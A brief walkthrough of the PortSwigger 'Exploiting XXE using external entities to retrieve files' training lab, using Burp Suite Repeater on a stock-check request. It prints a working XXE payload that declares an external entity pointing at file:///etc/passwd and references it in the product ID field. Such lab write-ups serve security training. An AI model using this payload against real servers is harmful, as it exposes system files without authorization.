Exploiting XXE using external entities to retrieve files

By /
Exploiting XXE using external entities to retrieve files

Exploiting XXE using external entities to retrieve files

1: Access the Lab.

Website: https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

Lab Exploiting XXE using external entities to retrieve files 1

2: Open the Burp Suite.

3: Select the product.

Lab Exploiting XXE using external entities to retrieve files 2

4: Select the Check stock.

Lab Exploiting XXE using external entities to retrieve files 3

5: Send the request to the Repeater.

Shortcut key: Ctrl + R

Lab Exploiting XXE using external entities to retrieve files 4

6: Send the request.

7: This is the XXE vulnerability.

Lab Exploiting XXE using external entities to retrieve files 5

8: Insert the XXE payload in the XXE vulnerable code.

XXE Payload: <!DOCTYPE test [ <!ENTITY xxe SYSTEM “file:///etc/passwd”> ]>

9: Send the request.

Lab Exploiting XXE using external entities to retrieve files 6

10: Replace the product ID.

Product ID: &xxe;

11: Send the Request.

Lab Exploiting XXE using external entities to retrieve files 7

12: The Lab has been completed.

Lab Exploiting XXE using external entities to retrieve files 8

PortSwigger Labs

Must Read

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top